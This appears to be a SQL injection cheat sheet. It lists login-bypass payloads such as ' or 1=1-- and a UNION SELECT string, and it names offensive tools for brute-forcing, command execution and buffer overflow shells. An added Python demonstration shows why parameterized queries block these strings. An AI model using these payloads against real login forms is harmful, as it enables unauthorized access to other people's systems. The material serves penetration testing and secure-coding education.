General info
There are four common database types, and each one reports errors in a different way:
- MySQL
  - error example: The used SELECT statements have a different number of columns
- MSSQL
  - error example: All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists
- Oracle
  - error example:
- PostgreSQL
  - error example: Each UNION query must have the same number of columns
Injection (SQLi)
Easy Injection Tests (aka Login Tricks)
admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1-- -
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1--
'UNION SELECT 1, 'admin', 'password', 1--
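Why these test strings work against a login form, and why bound parameters stop them, shown as an added example that is not part of the original cheat sheet. The `users` table, its sample row and the function names are assumptions made for the demonstration, and SQLite stands in for the database.

```python
import sqlite3

# Constructed sample data: an in-memory SQLite table standing in for a user store.
# The password is stored in plaintext only to keep the example short.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 's3cret-constructed')")
    return db

def login_concatenated(db, username, password):
    """Vulnerable form: user input is spliced into the SQL text."""
    sql = ("SELECT id FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # malformed SQL; a real app may leak this error to the user

def login_parameterized(db, username, password):
    """Hardened form: input is bound as data and never parsed as SQL."""
    sql = "SELECT id FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

# Test strings taken from the list above. '--' starts a comment in SQLite;
# the '#' variants rely on MySQL comment syntax and are left out here.
TEST_STRINGS = ["admin' --", "' or 1=1--", "' or 1=1-- -"]

def compare(db):
    """Return {test string: (concatenated result, parameterized result)}."""
    return {s: (login_concatenated(db, s, "wrong"),
                login_parameterized(db, s, "wrong")) for s in TEST_STRINGS}

if __name__ == "__main__":
    for s, (vuln, safe) in compare(make_db()).items():
        print(f"{s!r:16} concatenated={vuln} parameterized={safe}")
```

With string concatenation the quote closes the username literal and the comment marker discards the password check, so the query returns a row; with bound parameters the same string is compared as a literal username and matches nothing.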
Automatic scanning with SQLMap
Resources / More info
SQL Injection Hacking Tools
- SQLDict – Performs a dictionary attack against the SQL server
- SQLExec – Executes commands on a compromised SQL server
- SQLbf – Another password cracking program that performs both dictionary and brute force attacks
- SQLSmack – Linux based command shell program
- SQL2.exe – This UDP buffer overflow attack will return a command prompt to the attacker
- Msadc.pl – A SQL injection exploit
- Wapiti
- http://securitytools.wikidot.com/sql-injection
- https://securiteam.com/securityreviews/5DP0N1P76E
Links
Cheatsheets and more
SQLi Cheat Sheet - netsparker
SQLi Cheat Sheet - pentestmonkey